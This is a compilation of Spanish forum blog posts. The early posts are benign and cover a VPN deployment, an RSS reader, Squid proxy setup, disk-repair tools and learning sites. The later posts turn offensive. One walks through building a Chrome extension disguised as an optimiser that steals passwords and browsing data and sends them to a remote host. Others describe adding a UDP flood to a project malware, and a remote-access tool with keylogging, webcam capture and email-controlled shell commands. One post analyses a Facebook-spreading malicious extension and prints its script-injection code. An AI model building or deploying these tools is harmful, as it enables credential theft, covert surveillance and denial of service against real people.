Despliega tu propia red VPN (Point-to-Point) para salvaguardar tu privacidad, anonimato y sin limitaciones.
La instancia que se desplegara será de tipo spot (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta). En cuanto al despliegue el estado de terraform puede ser guardado en un bucket aws s3 (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), terraform enterprise (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) y de manera local, al momento de desconectarse de la VPN se eliminará de manera automatica la infraestructura y el estado de terraform (tfstate).
Repositorio


git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:davispalomino/aws-vpn-anon.git .
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Requisitos

- Cuenta AWS secret-access key
- AWS-cli (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
- Packer (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
- Ansible (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
- Terraform (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
- Centos 7* (en caso de tener otra distro deberas editar la línea 184 del archivo Makefile "sudo yum install -y ppp pptp pptp-setup" reemplazarlo según su distro)

Variables Requeridas
Name    Description    Type    Default    Required
REGION    Region de despliegue de infraestructura.    string    us-east-1    yes
TYPE    El tipo de servidor para la conexión VPN. standar/advance/high    string    standar    yes
SUBNET    La Subnet en la que se desplegara la infraestructura (requerida - PUBLIC).    string    n/a    yes
TFSTATE    Especificar si el tfstate se guardara en s3(bucket), enterprise(terraform) o local (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)    string    local    yes

Ejecución

make quickstart

Desconección

make disconnect

Deployment


Infraestructura


View
[](No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Desde la R.I.P. Google Read tuve que buscar otras maneras de no quedar desinformado ya que revisar una por una las 80 y tantas web que leo a diario, aveces suele quitar mucho tiempo de esa manera lo que necesitaba era aplicación de escritorio que sea multiplataforma así poder exportar e importar mis Feed.

¿Que rayos es un Feed?
Feed = fuente, alimentar y (sinónimos)
Si esta referido a una web de seguro el termino encaja perfecto con Fuente Web, un gran porcentaje de las web por no decir todas usan este medio para volver a transmitir lo escrito (en especial los blog) en dicha pagina pero en el se encuentras pequeños fragmentos del articulo(configurado por el webmaster) mas el titulo a cada porción de ello se le considera como un item , un lector puede suscribirse a un feed para obtener noticias posteadas en la pagina sin ir y revisarlas. El feed puede llegar a ser de 2 formas RSS y AtOM las dos tienes algo en particular que se encuentran en XML....

Por ello ya con varios meses (desde Enero) en mi Desktop va sin problemas








Ahi les dejo el backup de mis feed: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
QuiteRRS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Platformas
-Windows
-Linux(32 Bit & 64 Bit)
-OS/2

En el mundo existen 2 formas de aprender y la mejor desde mi punto de vista es siendo autodidacta aunque es el que mas tiempo te toma en aprender ya que solucionas tus problemas por tu cuenta, y ni que decir del sacrificio de las horas estando ahí detrás tratando de perfecionarlo y todo el esfuerzo lo llegas a valorar, la forma de buscar un material adecuado aveces no esta a nuestro favor, de la misma manera que existe codecademy también No tienes permitido ver los links. Registrarse o Entrar a mi cuenta dos website excelentes para encaminarte en el fascinante mundo de la programación.


En No tienes permitido ver los links. Registrarse o Entrar a mi cuenta encontraras material sobre: HTML5, Javascript y jQuery, CSS3, Python, Django, PHP, Java,Ruby, Ruby On Rails, C++, Git y Github, Node.js

"Hello World"



Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¿Que es Proxy?

Traducción Proxy= apoderado,intermedio(sinónimos)

Es el intermediador de solicitudes que hace el cliente y la salida de las mismas para la obtención de una respuesta, (cliente envía solicitud a Host y si se verifica sus políticas con los filtros devolviendo la respuesta), llegando a almacenar la cache teniendo una respuesta óptima con respecto al tiempo, se allow y deny está basado en los filtros que se configuran (establecidas en la políticas de la empresa) además almacena log en lo que se encuentran las peticiones que hacen los clientes haciendo un uso adecuado de los log se puede reestructurar los filtros brindando un adecuado uso de banda ancha se puede  implementar mediante Hardware o Software

Software:

Puedes usar desde los de licencia pública o las de pago en que más te convenga en mi caso tuve la oportunidad de probar el famoso squid y dansguardian  con respecto a los de pago Tivoli, Microsoft Proxy Server

Hardware:

Mikrotik Aunque es el único que tuve la oportunidad de conocerlo en una visita.

2 Maneras de implementar un servicio proxy.

SQUID:

"Squid es un proxy caché para el Web de soporte HTTP, HTTPS, FTP, etc. Reduce el ancho de banda y mejora los tiempos de respuesta mediante el almacenamiento en caché y la reutilización de las páginas web frecuentemente solicitados. Squid tiene amplios controles de acceso y hace un gran acelerador de servidor. Se ejecuta en sistemas operativos más disponibles, incluyendo Windows y está disponible bajo los términos de la GNU GPL"  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si deseas conocer más acerca de squid lo puedes leer en su website.



1.-Descargar Webmin: (pudes verificar la versión No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

wget http://prdownloads.sourceforge.net/webadmin/webmin_1.630_all.deb

2.-Verificamos con dir luego de ello instalamos

sudo dpkg -i webmin_1.630_all.deb

Si no se llega a instalar y nos  muestra el siguiente error:

sudo apt-get -f install

3.-El servicio se esta ejecutando

service webmin status

4.-Mostramos la IPprivada

ifconfig

5.-Colocamos en el navegador con el puerto 10000


6.-Te logeas con el user y pass de Inicio

7.-Instalamos Squid

sudo apt-get install squid

8.-Ahora configuramos el Squid nos dirigimos a Others > File Manager: Buscamos el directorio /etc/squid3/squid.conf.


9.-Una vez en el directorio modificamos los siguiente:

#http_port 3128 quedando http_port 3128

#cache_mem 256 quedando cache_mem 256

cache_dir ufs/var/spool/squid3 100 16 256 quedando cache_dir ufs/var/spool/squid3 1000 16 256

10.-Reiniciamos el servicio sudo service squid3 restart

11.- Nos dirigimos a Un-Used Modulo>Squid Proxy Server

y le damos en ClickHere


12.-Nos dirigimos a /etc/squid/squid.conf


13.-Y verificamos que se encuentra de la siguiente manera , si fuera el caso que no modificamos.

sort_conf=0
squid_restart=/etc/init.d/squid3 restart
squidclient=squidclient
cache_dir=/var/spool/squid3
sync_create=0
log_dir=/var/log/squid3
pid_file=/var/run/squid3.pid
cal_max=50000
squid_start=/etc/init.d/squid3 start
sync_modify=1
cal_fmt=w
cal_all=1
squid_path=squid3
calamaris=calamaris
squid_conf=/etc/squid3/squid.conf
sync_delete=0
cal_args=-aw
cachemgr_path=/usr/lib/cgi-bin/cachemgr.cgi
crypt_conf=0
restart_pos=0
squid_stop=/etc/init.d/squid3 stop
cal_extra=

14.- Reiniciamos el servicio de squid sudo service squid3 restart

15.- Un-Used Modulo>Squid Proxy Server y Agregamos las politicas

16.-Vea el video

Para revisar las configuraciones de filtro:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos

Buenas:



Muchas veces suele que a nuestras manos llega una portátil y si es windolero de seguro la pantalla azul y nos damos con la sorpresa que el HDD esta dañado, desconocemos los sectores pero lo importante es recuperar toda la información posible para ello entra a tallar un LiveCD existen múltiples desde los más livianos como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta puedes elegir cualquiera con el que te sientas mas cómodo lo puedes utilizar para respaldar tus archivos.


Una vez realizado esa tarea mano a la obra a discernir los sectores dañados para ello puedes utilizar las distros de Linux o Windows  con la que te sientes mas cómodo en este hilo tratare de un LiveCD muy conocido llamado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta uno de las herramientas de nuestra navaja suiza por sus muchas utilidades que le puedes dar, en este caso es reparar el sector si es que se da o como segunda opción aislarlo.

I.-OPCIÓN:

DRevitalize es un programa que repara sectores dañados(defectos físicos) en los dispositivos de almacenamiento magnético populares(Discos duros y también hasta cierto punto floppy) generando una secuencia especial de señales de alto y bajo nivel alrededor del área dañada físicamente. La superficie de casi cualquier unidad puede ser reparada con esta herramienta (incluso discos duros que han sufrido caidas o han sido expuestos a fuertes campos electromagnéticos).


hiren's


hiren's DRevitalize


hiren's DRevitalize


hiren's DRevitalize


hiren's DRevitalize


hiren's DRevitalize

Esperemos a que termine en su totalidad.

II.-OPCIÓN:

Victoria es una poderosa herramienta para las pruebas y el diagnóstico de los discos duros.  La aplicación dispone de un gran número de opciones, lo que permite, entre otras cosas, para determinar el estado actual del equipo, desactive la caché y reparar los sectores defectuosos.  Con un poco de práctica se puede medir la velocidad de lectura y escritura de datos, o seleccione el parámetro AAM (Advanced Managament Acoustic) de tal manera de silenciar el disco.



Victoria 4.46b


Victoria 4.46b


Victoria 4.46b


Victoria 4.46b

Luego de ello esperar que finalize.

III.-OPCIÓN:

Partition Bad Disk aplicación que fue diseñada para proporcionarte un medio simple de crear particiones de disco saludables. Esta herramienta analiza exhaustivamente el disco duro y aísla automáticamente los sectores defectuosos para que las particiones de nueva creación pueden estar completamente limpias de estas cuestiones


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk


Partition Bad Disk

Alguno de estas 3 opciones debe servirte por lo menos 1.

Link:

Hiren's: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para la OpcionIII

Link: Partition Bad Sector No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos

Casi la gran parte de las personas nacen con un S.O. bajo el brazo, la mayoría nació con Microsoft me incluyo pues Windows98 fue el primer paso a este mundo.
Detrás de cada S.O hay mil módulos, cursos, diplomados, etc que nos instruyen a un mas, en este caso microsoft aporta con un aprendizaje de sus IT y que de seguro a los que les gustaría seguir los pasos de un MVP les servirá como base.



Ademas encontraran un sistemas de puntuación muy influyente sin mas ni menos les dejo el link

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El curso de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se ve realmente estupendo....

Entre algunos link recuperados de mi backup me tope con algo muy llamativo y de seguro a mas de uno le interesara acabo de darle lectura a un par de módulos y son de mucha utilidad para reforzar todo lo que uno ya conoce o aun no.

Se trata de la Plataforma Educativa de ESET.
link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hace ya varias semanas me encontraba inactivo a causa de un accidente pero eso no amilano al espíritu programador, asi que les vengo a compartir una buena página en la que se aprenderá desde lo mas easy hasta lo mas hard.


Cursos:

HTML & CSS
JavaScript
Python
Ruby
Jquery
Php
Apis
.... y muchos retos

Así de la misma manera que uno puede llegar a aprender , también puede armar sus propios cursos.
Los cursos son 100% prácticos.


Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Después de algunos días de inactividad, decidí compartirles una parte de mi vida diaria, donde me la paso casi un buen tiempo al despertar desde el Desktop..

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si ustedes tienen algunas no duden en compartirlas...!!

SAludos

Hace unos días me tome un descanso y regrese a mis orígenes ... me tope con un material muy bueno para los que desean surfear por este mundo de la Seguridad Informática, aunque es algo básico-intermedio pero muestra el uso de las mayorías de las tools que cualquier distro de seguridad trae consigo .Para aquellos que empiezan a dar sus primeros pasos de seguro les ayudara a caminar.


ojo esta en ingles: Pero cuenta con imágenes así que si no se denomina ese idioma te podéis guiar con las capturas que en ella se encuentran.

URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

P.D.: Espero no que no encuentre en algún post si fuera así lo eliminare....

Al parecer esto se lo debo al dolor de cabeza que tuve ayer por la noche que hizo que me distrajera con alguna idea que se me salia de la imaginación  Como hace unas semanas vi un archivo javascript capaz de mostrar las contraseñas en forma local (escuchar al servidor) y en el nos arrojaba las contraseñas y el email.

Así que decidí ir por aquella imaginación que era tratar de enviar datos en forma remota:

1.- Primero se me paso por la cabeza que el javascript cree un archivo txt luego enviarlo, pero para crear un archivo txt un depende mucho de si es usuario que navega tiene los permisos suficiente Ademas no es lo mismo crear un txt linux-windows. Pero dije no es una loca idea.

2.-Segundo se me ocurrió enviar los datos via email. Pero como sabemos javascripit no es posible enviar , averigüé un poco mas que si se podía hacer mediante phpmailer pero dije bahh para eso necesito que hsoting tenga SSL ocorriento  443 , eso por que gmail-outlook necesita una conexión segura.

3.-Tercero pensé en enviar por el puerto 21 (FTP)para enviar los datos o sobre escribirlo  hice una conexión exitosa, pero como enviaba el archivo. Aunque con php si era posible pero lo que necesitaba era javascript... =(

function ftp_login(form) {
 var login = form.login.value;
 var pass= form.clave.value;
 var sererr = form.servidor.value;
 if (login && clave && servidor) {
 var ftp_connect = "ftp://" + login + ":" +pass + "@" + server;
 window.location = ftp_connect;
 }
 else {
 alert("=(No se conecto");
 }
 }

4.- Entonces dije si creo un zip el el que se guarde la contraseña y luego pueda enviarlo. Pero aun que sabia no era posible enviármelo al correo pero tal vez al FTP, puede llegar a crear un archivo zip pero con php e incluso podía enviar una imagen , uhmm entonces creí que tal vez podía enviar un screen, pero bueno sera para otra ocasión. Pero aquí esta el link con el cual se puede crear el archivo zip No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/

5.- Creo que las ideas se me acababan ya era las 3 a.m de la madrugada así que dije uhmmm me recode de XXS y dije EURECAAAAAAAAAAAA....!! Lo tenia...!!
Empecemos...!!
Bueno primero lo primero para crear el crx ( que es la extensión que tienen los complementos de Google Chrome) necesitamos 2 archivos el *.json y *.js (que es el javascript). En el *.json se encuentra la descripción del complemento . En mi caso fue lo siguiente: NO SE DEBE CAMBIAR EL NOMBRE" manifest.json"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Por que esta en ingles pues cuando instales el complemento la mayoría cuando se encuentra en otro idioma solo le pones YES.. asi que mejor esta ese idioma ademas el titulo es resaltante OPTIMIZAR Google Ghrome "En otras palabras " Obtener tu user y pass ". Luego verán que dice chrome.js ese es el archivo Javascript.

Ahora editamos el chrome.js lo único que necesitas editar por nuestro hosting  "localhost" Reemplazan por el suyo.


el javascripit tiene que estar en tener el tipo de codificacion UTF-8. Luego de ello vamos chrome y  *.json y *.js debe encontrarse en una carpeta.

Una vez abierto Chrome se dirigen a Extensiones.


Cuando nos encontremos ahi das click en el checkbox de Modo Desarrollador y luego Empaquetar Extensión.


Ahora se dirigen a la carpeta en donde se encuentra el *.json y  *.js en mi caso es C:\Users\Administrador\Desktop\Optimize Google Chrome esa misma dirección colocamos en el siguiente popup.


Luego empaquetara la extensión de google chrome.


Para poder instalar la extensión necesitas agregar

--enable-easy-off-store-extension-install

a las propiedades del acceso de google chrome.


Eso seria lo único negativo =( ..!!

Seguimos ahora ya podemos colocar la dirección que nos arrojo el popup en mi caso C:\Users\Administrador\Desktop\Optimize Google Chrome.crx el cual colocamos en la barra de dirección.

Ahora ya esta el 90 % del trabajo hecho, ahora solo necesitamos subir al hosting el archivo guardar.php acompañado de un archivo datos.txt (datos.txt debe tener los permisos suficientes para ser modificados).



ese archivo junto con el datos.txt deben subirlo al host. Si todo resulto bien cuando se ingrese a una pagina los datos serán enviados a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta usan el DECODEURL para no colocar un pass o un user incorrecto
Con la extensión se puede obtener:
<ul>
   <li>Contraseñas /Usuario</li>
   <li>El lenguaje</li>
   <li>Protocolo por el cual se navega</li>
   <li>El proxy</li>
   <li>Obtenemos el puerto</li>
   <li>El agente (wap o web)-(S.O)-(Navegador aunque ya sabemos que es google Chrome)</li>
   <li>La dirección ala que se accede</li>
   <li>La fecha.</li>
   <li> Y por supuesto la IP pública (podemos acceder a su router si es que la contraseña la tiene por default)</li>
</ul>

Link de Descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un AGRADECIMIENTO Especial a :
sh4r3m4n

Saludos

Agregando mas funciones a nuestro "malware" underc0de.exe, En este caso tomamos en cuenta a un factor dentro de la seguridad denominado negación de servicio (denial of services), uno de los más usados en la actualidad que también constituye  parte de las etapas de un Ataque ("Pentestig") y que cada vez que escucho o leo el algún artículo se me viene a la mente "MafiaBoy" uno de los grandes ataques usando este método.
En qué consiste el Dos cada vez que uno accede a un sitio web envía cierta cantidad de paquetes de datos en los cueles se incluye información que será devuelta por el servidor, esa cantidad suele ser mínima de esa manera no afecta al redimiendo del host a quien va dirigido la consulta, pero en este caso si llegáramos a enviar grandes paquetes para saturarlo además de utilizar no solo un ordenador si múltiples en este caso sería una distribución de negación de servicio conocido como "DDOS" y de esa manera alertaríamos el tiempo de respuesta que suele ser ms "milésimas de segundo".
Hay muchos tipos de ataque usando flood, en este caso solo tome el concepto de uno de ellos llamado UPD Flood.

El UDP es un protocolo que corresponde a la capa de transporte juntamente con el TCP, DCCP ... en Esta se incluye a 2 componente el destinatario y el destino. El UDP utiliza los datagramas o bloques de información que contiene la información necesaria haciendo que la red solo lo dirija hacia su destino  peor en este caso hablando ya de UDP no necesita establecer conexión con el destinatario para el envió de datagramas ya que en la cabecera del paquete se encuentra la información necesaria para encontrar su destino. Y por consiguiente tampoco se tiene confirmación si se llego con excito o no el paquete.


UPD Flood: Es inundar con grandes cantidades de paquetes UDP enviados a host llegando a un puerto aleatorio o ya establecido. Cuando el datagrama llega a su destino el apquete ira akl pa que aplicación será dirigida, pero cuando no se encuentra que dicha aplicación que se encuentra en dicho puerto no requiere dicho paquete se generara el conocido Internet Control Message Protocol (notificación de errores) como por ejemplo cuando un host no esta disponible. Cuando se llegan enviar múltiples paquetes podemos hacer que el sistema deje de funcionar.
Para proteger de este tipo de ataques se puede utilizar un firewall o las diferentes tecnologías como IPS(Intrusion prevention system ), filtrar los paquetes UDP y sobre todo monitorear la red y sus servicios.
Con un poco de teoría pasamos a ver como funciona:

Se envia con los parámetros necesarios:

IP: direcion ip
PORT: puerto
PACK: tamaño del paquete
SOCK:Repeticion se incluira en un for previamente en el código


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
o tambien puedes usar el famoso "namp"

un previo Testeo:


VER:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Link de Codigo Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link del Decryter No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link de ILMergeNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Link de myIp.php No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Underc0de.exe es un proyecto de Open Source (GPL) con el fin de enseñar y promover la conciencia a los internautas sobre la problemática que curren
cuando un malware infecta a los ordenadores. No me responsabilizo de cualquier uso malintencionado que se haga del proyecto, así como de las modificaciones que los usuarios puedan realizar al código fuente de las aplicación, tampoco me hago responsable de las copias del proyecto que sean distribuidas a través de otras website o usuarios y que puedan haber sido modificadas con intenciones dudosas.

El celular no deja de sonar por las múltiples notificaciones que recibía y todas eran la por las  etiquetas que recibía mi cuenta de Facebook, joooder y todas tenían una dirección algo extraña. www.ناماراتاماراتامارات.امارات  y según google es Persa... que rara dirección. Así que agarre el ordenador y me puse a averiguar porque me daba mala espina. Vi la dirección de la redirección y era esta www.xn--mgbaaaaaaaaydd5fee22afff.xn--mgbaam7a8h  WDF...!! Pero seguí mas adelante tome la dirección www.sosyalpaket.net  al parecer la primera dirección era el camuflaje aquella te envía a otra página según el navegador que tengas. Con el Siguiente código:

var is_opera=navigator.userAgent.toLowerCase().indexOf("opera")>-1;
var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_safari=navigator.userAgent.toLowerCase().indexOf("safari")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){inst="http://www.sosyalpaket.net/chrome.php"}
else
if(is_firefox){inst="http://www.sosyalpaket.net/firefox.php"}
else
if(is_opera){inst="http://www.sosyalpaket.net/chrome.php"}
else
{var inst="http://www.sosyalpaket.net/chrome.php"}

Lo que te envía es a descargar un complemento según el navegador que tengas, en este caso lo teste con firefox y me envió a descargar un complemento.

Con el siguiente mensaje:

Por favor, botón Actualizar Firefox Actualice.
Debido a los errores del sistema y vulnerabilidades de seguridad que se requieren pulsando el botón Recargar
Instalar el plug-in de Firefox Update.
Siempre y cuando usted no ha actualizado las características del sitio faydalanamayacaksınız.


Lo que me dio risa fue ese mensaje de "Debido a los errores del sistema y vulnerabilidades de seguridad" jajajaja le seguiremos la corriente una vez descargado abrimos el complemento con winrar pero antes lo escaneamos para ver si este malware ya fue reportado.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y el resultado fue 6 / 45 así que por el momento no todos los antimalware lo reconocen. Ya que lo tenía abierto empecé a entender las líneas de códigos.


Y encontré algo que me resulto familiar

if(location.hostname.indexOf("facebook.com") >= 0){

addJavascript('http://sosyalpaket.net/yeni.php');

addJavascript('http://fbmedyahizmetleri.com/bakgel.php');

addJavascript('http://facebookhizmetlerim.com/user.php');

}

En el user.php me tope con:

"https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }

Es por ese medio por el cual se propaga y si llegas a descargar por que eres de aquellas personas que le da click a todo button que ve solo basta con dirigirte a tu navegador al apartado extensión o complemento según sea el caso y verificar una similar a ello.


Lo más razonable es eliminarlo.
Saludos

Este artículo lo tenía guardado y por falta de tiempo no lo di a conocer, hace una par de semanas para ser exactos creo que fueron 2 publique un artículo que se tratada sobre un "Mouselogger" (denominado así pues capturada los click en determinados procesos), pero esta vez les traigo algo un poco más complejo bueno por así decirlo este. A comparación del lo publicado hace semanas este no captura las coordenadas de los click que se realizan si no por otro lado captura el imágenes de la webcam, grabaciones, envió de código a la terminal y por su puesto el infaltable log del teclado. Eso está incluido en la versión alfa pues puede llegar a salir a la luz los infaltables errores. Pero por  el momento es todo ello lo que nos puede ofrecer la pequeña aplicación que es este caso lleva el nombre de "Underc0de.Malware".

Una Captura del Solution Explorer:


Cada proceso que a realizar se encuentra en una carpeta especifica, para así de esa manera tener más orden. Empecemos a explicar un poco el código y como se ejecuta:

        Keylogger_CreateTxt.load()

        Move_Exe_Ejecutarse.MoverExe() 

        Autorun.Autorun()
        
        BuscarDispositivos()

        CreateCarpeta.Carpeta()
      
        Systeminfo.DatumPc()
      
        Intervalo_Pop.Timeejecutar(Intervalo_Pop.tiempototal)

1.- Como se ve el primero en ejecutar es la creación de la carpeta pues será esa el nido de nuestro malware
2.- Lo siguiente será mover nuestro exe a dicho carpeta creada
3.- Se ejecutara el autorun
4.- Busca un dispositivo de CamWeb
5.- Realiza ya comprobación para conocer la IP pública, IP privada y el nombre de la PC.
6.- Se ejecuta el intervalo de comprobación POP

Hay un Modulo

Config_General 

en el cual se encuentra parámetros como el Email, ubicación de Carpetas, tiempo de verificación de POP, Webcam, Log del teclado, Rec Audio,Capture Pantalla y el Terminal. Si se decide cambiar parámetros es en ese modulo donde se debe reemplazar con el valor que usted desea.


Si llega un mensaje del destinatario al que se enviara el mensaje:

    Public Config_Para As String = "[email protected]"

NOTA: El mensaje que se envía debe ser el mismo al que se enviara el mensaje. Para así otras personas que envían el parametro de un correo diferente el programa los desconosca.
Esto son las variables que reconoce el programa cuando se envía

            Dim ComanPantalla As String = "Pantalla"
            Dim ComanWebcam As String = "WebCam"
            Dim RecAudio As String = "RecAudio"
            Dim Terminal As String = "Terminal"
            Dim Keylogger As String = "Keylogger"

Estos variables deben estar en el Asunto


Eso sucederá para Captura de Pantalla, Webcam y Keylogger. Pero a diferencia del Terminal(que lo denomine así al Consola de Windows) en Asunto sería diferente.


La forma de escribirlo en la consola de Win seria: ipconfig /all , el espacio lo he reemplazado por los ":" dos puntos, pero si solo se quiere enviar un consulta sin argumento sería de la siguiente manera:


En este caso después de los dos puntos se encontrara vacio. Pero se debe colocar necesariamente los ":" sin espacio alguno al final.

Mientras para RECAUDIO el intervalo que tu coloques:

#Region "Tiempo Verificacion POP"
